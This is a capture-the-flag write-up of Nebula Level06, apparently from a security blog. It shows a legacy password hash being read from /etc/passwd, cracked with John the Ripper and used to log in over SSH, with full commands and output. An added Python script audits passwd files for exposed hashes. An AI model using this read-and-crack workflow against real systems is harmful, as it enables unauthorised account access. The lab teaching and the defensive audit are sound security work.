Mike-Boya

Information Security and Programming Blog

Exploit Exercises - Nebula Level06

Level06 specifies that “The flag06 account credentials came from a legacy unix system.”

I believe the hint spells out exactly what we need to solve this level.

Legacy Unix systems stored password hashes directly in /etc/passwd, which is world-readable. Modern systems store this sensitive information in the shadow file (/etc/shadow) instead.

A quick grep statement should confirm if my suspicions are correct.

    level06@nebula:~$ grep flag06 /etc/passwd
    flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

Perfect, the line for the flag06 account contains a password hash instead of the ‘x’ that would be displayed on a modern system utilizing /etc/shadow.
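A defender-side check for the condition shown above, added here as an example and not part of the original post: it scans passwd-format lines and reports every entry whose password field holds a hash, or is empty, rather than a placeholder such as 'x'. The sample lines other than the flag06 entry, the placeholder set and the function names are assumptions made for this example.

```python
import re

# Values that mean "no hash stored here": shadowed, locked or disabled account.
PLACEHOLDERS = {"x", "*", "!", "!!", "*LK*", "*NP*"}
DESCRYPT_RE = re.compile(r"[./0-9A-Za-z]{13}")  # DES crypt(3): 2 salt + 11 hash chars
MCF_RE = re.compile(r"\$([0-9a-z]+)\$")         # modular crypt format: $id$...
MCF_NAMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}

# Constructed sample; only the flag06 line is taken from the post.
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
level06:x:1007:1007::/home/level06:/bin/sh
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
svc:$6$constructedsalt$constructedhashvalue:1100:1100::/home/svc:/bin/sh
guest::1200:1200::/home/guest:/bin/sh
""".splitlines()

def classify(field):
    """Label a passwd password field; None means it is only a placeholder."""
    if field in PLACEHOLDERS:
        return None
    if field == "":
        return "empty"          # account can be entered without a password
    if DESCRYPT_RE.fullmatch(field):
        return "descrypt"
    match = MCF_RE.match(field)
    if match:
        return MCF_NAMES.get(match.group(1), "modular-crypt")
    return "unrecognised"

def audit_passwd(lines):
    """Return (line number, user, finding) for entries exposing a credential."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line or line[0] in "#+-":   # blanks, comments, NIS compat entries
            continue
        parts = line.split(":")
        if len(parts) != 7:
            findings.append((lineno, parts[0], "malformed"))
            continue
        finding = classify(parts[1])
        if finding:
            findings.append((lineno, parts[0], finding))
    return findings

if __name__ == "__main__":
    print(*audit_passwd(SAMPLE), sep="\n")
```

To audit a real host, pass `open("/etc/passwd")` to `audit_passwd` instead of `SAMPLE`; any finding means the credential should be moved into the shadow file and the password changed.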

Time to fire up John the Ripper to crack the hash:

    foo@kali:~$ john flag06
    Using default input encoding: UTF-8
    Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX])
    Will run 2 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    hello            (flag06)
    1g 0:00:00:00 DONE 2/3 (2016-02-06 01:17) 100.0g/s 881200p/s 881200c/s 881200C/s 123456..nutmegs
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed

John quickly identifies the password as ‘hello’. Time to test:

    level06@nebula:~$ ssh flag06@localhost
    The authenticity of host 'localhost (127.0.0.1)' can't be established.
    RSA key fingerprint is 67:fe:f4:09:cd:0f:ba:dd:87:2b:73:2c:80:31:c2:68.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added 'localhost' (RSA) to the list of known hosts.

        _   __     __          __
       / | / /__  / /_  __  __/ /___ _
      /  |/ / _ \/ __ \/ / / / / __ `/
     / /|  /  __/ /_/ / /_/ / / /_/ /
    /_/ |_/\___/_.___/\__,_/_/\__,_/

    exploit-exercises.com/nebula


    For level descriptions, please see the above URL.

    To log in, use the username of "levelXX" and password "levelXX", where
    XX is the level number.

    There are currently 20 levels (00 - 19).



    flag06@localhost's password:
    Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

    * Documentation:  https://help.ubuntu.com/
    New release '12.04 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.


    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.

    flag06@nebula:~$ getflag
    You have successfully executed getflag on a target account

The password worked; I was able to successfully log in to the flag06 account and run getflag.

Mike